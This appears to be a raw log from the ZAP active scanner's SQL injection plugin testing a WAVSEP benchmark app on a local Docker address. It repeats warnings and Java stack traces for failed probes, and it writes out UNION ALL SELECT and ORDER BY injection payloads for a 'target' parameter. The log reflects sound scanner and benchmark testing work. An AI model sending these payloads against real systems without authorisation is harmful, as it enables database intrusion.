java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688461 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688462 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688463 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688463 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688465 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688466 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688468 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688469 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688470 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688471 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9688472 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' ORDER BY 1689#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' ORDER BY 1689# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9688474 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688475 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at 